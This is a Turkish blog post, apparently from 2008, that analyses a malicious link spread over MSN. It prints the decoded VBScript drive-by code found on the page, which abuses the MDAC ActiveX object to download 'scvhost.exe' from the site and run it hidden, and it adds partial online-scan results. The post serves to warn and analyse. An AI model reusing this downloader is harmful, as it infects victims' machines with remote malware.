->
Bu gün bana msn üzerinden bir link gönderildi
mesajın içeriği ise aşağıdaki gibiydi
Ulkemize destek icin oy kullanalim. Es gecme lütfen.
http://www.francenatural.fr
siteye girdiğimizde bizden Microsoft - Data Access activex nesnesine onay vermemiz isteniyordu. Buraya kadar herşey düzgün ve normal duruyordu ancak dikkatimi çeken şey sitenin fransa kökenli ve Türkçe olmasıydı. Sitenin anasayfasına baktığımda ise şarap tanıtım sitesiydi.
hemen huylanıp geri döndüm ve sayfa kodlarınıinceledim.. ama sayfa kodlarıjavascript encode ile kodlanmış şifreli durumdaydı. Kodları4 sefer encode yaparak şifrelemiş olmalarına rağmen decode yaptım ve html kodlarınıincelediğimde
<script LANGUAGE=”JavaScript”>
function CC_noErrors() {
return true;
}
window.onerror = CC_noErrors;
</script>
<script language=”VBScript”>
on error resume next
dl = “http://www.francenatural.fr
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”scvhost.exe”
set F = df.createobject(”Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0
</script>
</head>
kodlarınıgördüm. bahsi geçen linkten scvhost.exe dosyasınıçektim ve antivirüs ile kontrol ettim ancak virüs yoktu… kendi sitem üzerindeki online tarama ile kontrol ettiğimde ise aşağıdaki rapora ulaştım.
File scvhost.exe received on 03.25.2008 13:13:31 (CET)
Current status: Loading … queued waiting scanning finished NOT FOUND STOPPED
![]()
Result: 14/32 (43.75%)
Loading server information…
Your file is queued in position: 4.
Estimated start time is between 47 and 68 seconds.
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they’re generated.
Powered by MightyAdsense